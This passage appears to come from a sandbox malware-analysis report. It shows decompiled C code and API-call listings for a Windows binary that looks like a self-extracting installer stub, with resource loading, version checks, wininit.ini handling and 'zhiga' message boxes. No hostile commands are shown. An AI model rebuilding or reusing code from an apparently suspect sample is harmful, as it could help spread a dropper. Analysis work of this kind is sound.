                                                                        									_t42 =  *_t59;
                                                                        									_t59 =  &(_t59[1]);
                                                                        								} while (_t42 != 0);
                                                                        								L17:
                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                        							}
                                                                        						}
                                                                        						_t64 = CharNextA(_t64);
                                                                        					}
                                                                        					 *_t65 = _t17;
                                                                        				}
                                                                        				return E00A36CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                        			}























                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A32AE6
                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A32AF2
                                                                        • CharNextA.USER32(?), ref: 00A32B12
                                                                        • CharUpperA.USER32 ref: 00A32B1E
                                                                        • CharPrevA.USER32(?,?), ref: 00A32B55
                                                                        • CharNextA.USER32(?), ref: 00A32BD4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                        • String ID:
                                                                        • API String ID: 571164536-0
                                                                        • Opcode ID: 38c15ca2d040620062019a3dde25830e540b34fe32679b3769cb3de8c9a491e2
                                                                        • Instruction ID: f03dd6b14643cbf03511828a38774e783f9a690f825074952e2bb8a9ae2e7318
                                                                        • Opcode Fuzzy Hash: 38c15ca2d040620062019a3dde25830e540b34fe32679b3769cb3de8c9a491e2
                                                                        • Instruction Fuzzy Hash: DF4126346042959FDB159F349C54BFDBBB99F66300F14419AF8C287202DB358E87CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E00A343D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                        				signed int _v8;
                                                                        				struct tagRECT _v24;
                                                                        				struct tagRECT _v40;
                                                                        				struct HWND__* _v44;
                                                                        				intOrPtr _v48;
                                                                        				int _v52;
                                                                        				intOrPtr _v56;
                                                                        				int _v60;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				void* _t53;
                                                                        				intOrPtr _t56;
                                                                        				int _t59;
                                                                        				struct HWND__* _t63;
                                                                        				struct HWND__* _t67;
                                                                        				struct HWND__* _t68;
                                                                        				struct HDC__* _t69;
                                                                        				int _t72;
                                                                        				signed int _t74;
                                                                        
                                                                        				_t63 = __edx;
                                                                        				_t29 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t29 ^ _t74;
                                                                        				_t68 = __edx;
                                                                        				_v44 = __ecx;
                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                        				_v48 = _v40.right - _v40.left;
                                                                        				GetWindowRect(_t68,  &_v24);
                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                        				_t69 = GetDC(_v44);
                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                        				ReleaseDC(_v44, _t69);
                                                                        				_t56 = _v48;
                                                                        				asm("cdq");
                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                        				_t67 = 0;
                                                                        				if(_t72 >= 0) {
                                                                        					_t63 = _v52;
                                                                        					if(_t72 + _t56 > _t63) {
                                                                        						_t72 = _t63 - _t56;
                                                                        					}
                                                                        				} else {
                                                                        					_t72 = _t67;
                                                                        				}
                                                                        				asm("cdq");
                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                        				if(_t59 >= 0) {
                                                                        					_t63 = _v60;
                                                                        					if(_t59 + _t53 > _t63) {
                                                                        						_t59 = _t63 - _t53;
                                                                        					}
                                                                        				} else {
                                                                        					_t59 = _t67;
                                                                        				}
                                                                        				return E00A36CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                        			}

























                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00A343F1
                                                                        • GetWindowRect.USER32(00000000,?), ref: 00A3440B
                                                                        • GetDC.USER32(?), ref: 00A34423
                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A3442E
                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A3443A
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00A34447
                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A344A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                        • String ID:
                                                                        • API String ID: 2212493051-0
                                                                        • Opcode ID: 960d4002ec6435f484e9ef0ff923ffc12051bf8442d5067279bd4aa74a3107b2
                                                                        • Instruction ID: 925b26359d53d87bca27a61d9ed74ed9075e788d955136d2013cc4958cfe8aa9
                                                                        • Opcode Fuzzy Hash: 960d4002ec6435f484e9ef0ff923ffc12051bf8442d5067279bd4aa74a3107b2
                                                                        • Instruction Fuzzy Hash: 05312E72E00119AFCB14CFF8DD899EEBBB5EB99310F154269F805F7250DA70AD058B60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E00A36298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v28;
                                                                        				intOrPtr _v32;
                                                                        				struct HINSTANCE__* _v36;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t16;
                                                                        				struct HRSRC__* _t21;
                                                                        				intOrPtr _t26;
                                                                        				void* _t30;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr* _t40;
                                                                        				void* _t41;
                                                                        				intOrPtr* _t44;
                                                                        				intOrPtr* _t45;
                                                                        				void* _t47;
                                                                        				signed int _t50;
                                                                        				struct HINSTANCE__* _t51;
                                                                        
                                                                        				_t44 = __edx;
                                                                        				_t16 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t16 ^ _t50;
                                                                        				_t46 = 0;
                                                                        				_v32 = __ecx;
                                                                        				_v36 = 0;
                                                                        				_t36 = 1;
                                                                        				E00A3171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                        				while(1) {
                                                                        					_t51 = _t51 + 0x10;
                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                        					if(_t21 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                        					if(_t45 == 0) {
                                                                        						 *0xa39124 = 0x80070714;
                                                                        						_t36 = _t46;
                                                                        					} else {
                                                                        						_t5 = _t45 + 8; // 0x8
                                                                        						_t44 = _t5;
                                                                        						_t40 = _t44;
                                                                        						_t6 = _t40 + 1; // 0x9
                                                                        						_t47 = _t6;
                                                                        						do {
                                                                        							_t26 =  *_t40;
                                                                        							_t40 = _t40 + 1;
                                                                        						} while (_t26 != 0);
                                                                        						_t41 = _t40 - _t47;
                                                                        						_t46 = _t51;
                                                                        						_t7 = _t41 + 1; // 0xa
                                                                        						 *0xa3a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                        						_t30 = _v32();
                                                                        						if(_t51 != _t51) {
                                                                        							asm("int 0x29");
                                                                        						}
                                                                        						_push(_t45);
                                                                        						if(_t30 == 0) {
                                                                        							_t36 = 0;
                                                                        							FreeResource(??);
                                                                        						} else {
                                                                        							FreeResource();
                                                                        							_v36 = _v36 + 1;
                                                                        							E00A3171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                        							_t46 = 0;
                                                                        							continue;
                                                                        						}
                                                                        					}
                                                                        					L12:
                                                                        					return E00A36CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                        				}
                                                                        				goto L12;
                                                                        			}























                                                                        APIs
                                                                          • Part of subcall function 00A3171E: _vsnprintf.MSVCRT ref: 00A31750
                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A351CA,00000004,00000024,00A32F71,?,00000002,00000000), ref: 00A362CD
                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A351CA,00000004,00000024,00A32F71,?,00000002,00000000), ref: 00A362D4
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A351CA,00000004,00000024,00A32F71,?,00000002,00000000), ref: 00A3631B
                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A36345
                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A351CA,00000004,00000024,00A32F71,?,00000002,00000000), ref: 00A36357
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                        • String ID: UPDFILE%lu
                                                                        • API String ID: 2922116661-2329316264
                                                                        • Opcode ID: a782d35202010e145d18dd0fb6aba263385bfe4b9ca23a1fa61b2da084039b09
                                                                        • Instruction ID: 28d64572dd50f0ce0ae9889048602bb0c423f706b26f2ac686cf85a624aad6e7
                                                                        • Opcode Fuzzy Hash: a782d35202010e145d18dd0fb6aba263385bfe4b9ca23a1fa61b2da084039b09
                                                                        • Instruction Fuzzy Hash: 4821F171A00229ABDB14DFA49C499FFBB7CFF49710F044229FA42A7241DB759D028BE0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00A3681F(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v20;
                                                                        				struct _OSVERSIONINFOA _v168;
                                                                        				void* _v172;
                                                                        				int* _v176;
                                                                        				int _v180;
                                                                        				int _v184;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t19;
                                                                        				long _t31;
                                                                        				signed int _t35;
                                                                        				void* _t36;
                                                                        				intOrPtr _t41;
                                                                        				signed int _t44;
                                                                        
                                                                        				_t36 = __ebx;
                                                                        				_t19 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t19 ^ _t44;
                                                                        				_t41 =  *0xa381d8; // 0xfffffffe
                                                                        				_t43 = 0;
                                                                        				_v180 = 0xc;
                                                                        				_v176 = 0;
                                                                        				if(_t41 == 0xfffffffe) {
                                                                        					 *0xa381d8 = 0;
                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                        						L12:
                                                                        						_t41 =  *0xa381d8; // 0xfffffffe
                                                                        					} else {
                                                                        						_t41 = 1;
                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							_t31 = RegQueryValueExA(_v172, 0xa31140, 0,  &_v184,  &_v20,  &_v180);
                                                                        							_t43 = _t31;
                                                                        							RegCloseKey(_v172);
                                                                        							if(_t31 != 0) {
                                                                        								goto L12;
                                                                        							} else {
                                                                        								_t40 =  &_v176;
                                                                        								if(E00A366F9( &_v20,  &_v176) == 0) {
                                                                        									goto L12;
                                                                        								} else {
                                                                        									_t35 = _v176 & 0x000003ff;
                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                        										 *0xa381d8 = _t41;
                                                                        									} else {
                                                                        										goto L12;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E00A36CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                        			}



















                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A3686E
                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00A368A7
                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A368CC
                                                                        • RegQueryValueExA.ADVAPI32(?,00A31140,00000000,?,?,0000000C), ref: 00A368F4
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00A36902
                                                                          • Part of subcall function 00A366F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A3691A), ref: 00A36741
                                                                        Strings
                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 00A368C2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                        • API String ID: 3346862599-1109908249
                                                                        • Opcode ID: 7bc293b771e212913f2cf32ab61eb20c772b9feef098d37f3f957622bf379370
                                                                        • Instruction ID: 5884c6b52a725b82cde2b163f8f4a09ad3ac4ba9856ab38f1d6c2cb5429cf578
                                                                        • Opcode Fuzzy Hash: 7bc293b771e212913f2cf32ab61eb20c772b9feef098d37f3f957622bf379370
                                                                        • Instruction Fuzzy Hash: 5A319331A00328EFDB31CB51CC45BAAB778FB45764F1041A5F94DA6250DB709E86CF52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00A33A3F(void* __eflags) {
                                                                        				void* _t3;
                                                                        				void* _t9;
                                                                        				CHAR* _t16;
                                                                        
                                                                        				_t16 = "LICENSE";
                                                                        				_t1 = E00A3468F(_t16, 0, 0) + 1; // 0x1
                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                        				 *0xa38d4c = _t3;
                                                                        				if(_t3 != 0) {
                                                                        					_t19 = _t16;
                                                                        					if(E00A3468F(_t16, _t3, _t28) != 0) {
                                                                        						if(lstrcmpA( *0xa38d4c, "<None>") == 0) {
                                                                        							LocalFree( *0xa38d4c);
                                                                        							L9:
                                                                        							 *0xa39124 = 0;
                                                                        							return 1;
                                                                        						}
                                                                        						_t9 = E00A36517(_t19, 0x7d1, 0, E00A33100, 0, 0);
                                                                        						LocalFree( *0xa38d4c);
                                                                        						if(_t9 != 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						 *0xa39124 = 0x800704c7;
                                                                        						L2:
                                                                        						return 0;
                                                                        					}
                                                                        					E00A344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree( *0xa38d4c);
                                                                        					 *0xa39124 = 0x80070714;
                                                                        					goto L2;
                                                                        				}
                                                                        				E00A344B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0xa39124 = E00A36285();
                                                                        				goto L2;
                                                                        			}







                                                                        APIs
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A32F64,?,00000002,00000000), ref: 00A33A5D
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A33AB3
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                          • Part of subcall function 00A36285: GetLastError.KERNEL32(00A35BBC), ref: 00A36285
                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A33AD0
                                                                        • LocalFree.KERNEL32 ref: 00A33B13
                                                                          • Part of subcall function 00A36517: FindResourceA.KERNEL32(00A30000,000007D6,00000005), ref: 00A3652A
                                                                          • Part of subcall function 00A36517: LoadResource.KERNEL32(00A30000,00000000,?,?,00A32EE8,00000000,00A319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A36538
                                                                          • Part of subcall function 00A36517: DialogBoxIndirectParamA.USER32(00A30000,00000000,00000547,00A319E0,00000000), ref: 00A36557
                                                                          • Part of subcall function 00A36517: FreeResource.KERNEL32(00000000,?,?,00A32EE8,00000000,00A319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A36560
                                                                        • LocalFree.KERNEL32(00000000,00A33100,00000000,00000000), ref: 00A33AF4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                        • String ID: <None>$LICENSE
                                                                        • API String ID: 2414642746-383193767
                                                                        • Opcode ID: 51b406b0b747f89763896a9a02abac47bca2d112b82ca740ab4b6a2d6e8b87d5
                                                                        • Instruction ID: 314fa9d740ce95224728581221c303ae6da40cf7b4e590060b1631b9755e9901
                                                                        • Opcode Fuzzy Hash: 51b406b0b747f89763896a9a02abac47bca2d112b82ca740ab4b6a2d6e8b87d5
                                                                        • Instruction Fuzzy Hash: 9E11EC317042117BDB24DFB2AD0AE1779BDDBE9B40F10453EB581E61A0DFBD88029620
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00A324E0(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t7;
                                                                        				void* _t20;
                                                                        				long _t26;
                                                                        				signed int _t27;
                                                                        
                                                                        				_t20 = __ebx;
                                                                        				_t7 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t7 ^ _t27;
                                                                        				_t25 = 0x104;
                                                                        				_t26 = 0;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					E00A3658A( &_v268, 0x104, "wininit.ini");
                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                        					if(_t25 != 0xffffffff) {
                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                        						_lclose(_t25);
                                                                        					}
                                                                        				}
                                                                        				return E00A36CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                        			}












                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A32506
                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A3252C
                                                                        • _lopen.KERNEL32(?,00000040), ref: 00A3253B
                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A3254C
                                                                        • _lclose.KERNEL32(00000000), ref: 00A32555
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                        • String ID: wininit.ini
                                                                        • API String ID: 3273605193-4206010578
                                                                        • Opcode ID: ce28762b34c26015e3c36914a7e44b5ae193a2a869fd970663750a5075090f2b
                                                                        • Instruction ID: 7458fcf527c7879fccd4a81f1122f076ee6270c30ae781b65f4c24b1cdf98920
                                                                        • Opcode Fuzzy Hash: ce28762b34c26015e3c36914a7e44b5ae193a2a869fd970663750a5075090f2b
                                                                        • Instruction Fuzzy Hash: 390171326001286BC724DBA59D0DEDFBBBCEB96761F000165FA89D3190DE748E46CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00A336EE(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _OSVERSIONINFOA _v416;
                                                                        				signed int _v420;
                                                                        				signed int _v424;
                                                                        				CHAR* _v428;
                                                                        				CHAR* _v432;
                                                                        				signed int _v436;
                                                                        				CHAR* _v440;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t72;
                                                                        				CHAR* _t77;
                                                                        				CHAR* _t91;
                                                                        				CHAR* _t94;
                                                                        				int _t97;
                                                                        				CHAR* _t98;
                                                                        				signed char _t99;
                                                                        				CHAR* _t104;
                                                                        				signed short _t107;
                                                                        				signed int _t109;
                                                                        				short _t113;
                                                                        				void* _t114;
                                                                        				signed char _t115;
                                                                        				short _t119;
                                                                        				CHAR* _t123;
                                                                        				CHAR* _t124;
                                                                        				CHAR* _t129;
                                                                        				signed int _t131;
                                                                        				signed int _t132;
                                                                        				CHAR* _t135;
                                                                        				CHAR* _t138;
                                                                        				signed int _t139;
                                                                        
                                                                        				_t72 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t72 ^ _t139;
                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                        				_t115 = __ecx;
                                                                        				_t135 = 0;
                                                                        				_v432 = __ecx;
                                                                        				_t138 = 0;
                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                        					_t133 = _v416.dwMajorVersion;
                                                                        					_t119 = 2;
                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                        					__eflags = _t77;
                                                                        					if(_t77 == 0) {
                                                                        						_t119 = 0;
                                                                        						__eflags = 1;
                                                                        						 *0xa38184 = 1;
                                                                        						 *0xa38180 = 1;
                                                                        						L13:
                                                                        						 *0xa39a40 = _t119;
                                                                        						L14:
                                                                        						__eflags =  *0xa38a34 - _t138; // 0x0
                                                                        						if(__eflags != 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						__eflags = _t115;
                                                                        						if(_t115 == 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						_v428 = _t135;
                                                                        						__eflags = _t119;
                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                        						_t11 =  &_v420;
                                                                        						 *_t11 = _v420 & _t138;
                                                                        						__eflags =  *_t11;
                                                                        						_v440 = _t115;
                                                                        						do {
                                                                        							_v424 = _t135 * 0x18;
                                                                        							_v436 = E00A32A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                        							_t91 = E00A32A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                        							_t123 = _v436;
                                                                        							_t133 = 0x54d;
                                                                        							__eflags = _t123;
                                                                        							if(_t123 < 0) {
                                                                        								L32:
                                                                        								__eflags = _v420 - 1;
                                                                        								if(_v420 == 1) {
                                                                        									_t138 = 0x54c;
                                                                        									L36:
                                                                        									__eflags = _t138;
                                                                        									if(_t138 != 0) {
                                                                        										L40:
                                                                        										__eflags = _t138 - _t133;
                                                                        										if(_t138 == _t133) {
                                                                        											L30:
                                                                        											_v420 = _v420 & 0x00000000;
                                                                        											_t115 = 0;
                                                                        											_v436 = _v436 & 0x00000000;
                                                                        											__eflags = _t138 - _t133;
                                                                        											_t133 = _v432;
                                                                        											if(__eflags != 0) {
                                                                        												_t124 = _v440;
                                                                        											} else {
                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                        												_v420 =  &_v268;
                                                                        											}
                                                                        											__eflags = _t124;
                                                                        											if(_t124 == 0) {
                                                                        												_t135 = _v436;
                                                                        											} else {
                                                                        												_t99 = _t124[0x30];
                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                        												__eflags = _t99 & 0x00000001;
                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                        													asm("sbb ebx, ebx");
                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                        												} else {
                                                                        													_t115 = 0x104;
                                                                        												}
                                                                        											}
                                                                        											__eflags =  *0xa38a38 & 0x00000001;
                                                                        											if(( *0xa38a38 & 0x00000001) != 0) {
                                                                        												L64:
                                                                        												_push(0);
                                                                        												_push(0x30);
                                                                        												_push(_v420);
                                                                        												_push("zhiga");
                                                                        												goto L65;
                                                                        											} else {
                                                                        												__eflags = _t135;
                                                                        												if(_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												__eflags =  *_t135;
                                                                        												if( *_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												MessageBeep(0);
                                                                        												_t94 = E00A3681F(_t115);
                                                                        												__eflags = _t94;
                                                                        												if(_t94 == 0) {
                                                                        													L57:
                                                                        													0x180030 = 0x30;
                                                                        													L58:
                                                                        													_t97 = MessageBoxA(0, _t135, "zhiga", 0x00180030 | _t115);
                                                                        													__eflags = _t115 & 0x00000004;
                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                        														__eflags = _t115 & 0x00000001;
                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                        															goto L66;
                                                                        														}
                                                                        														__eflags = _t97 - 1;
                                                                        														L62:
                                                                        														if(__eflags == 0) {
                                                                        															_t138 = 0;
                                                                        														}
                                                                        														goto L66;
                                                                        													}
                                                                        													__eflags = _t97 - 6;
                                                                        													goto L62;
                                                                        												}
                                                                        												_t98 = E00A367C9(_t124, _t124);
                                                                        												__eflags = _t98;
                                                                        												if(_t98 == 0) {
                                                                        													goto L57;
                                                                        												}
                                                                        												goto L58;
                                                                        											}
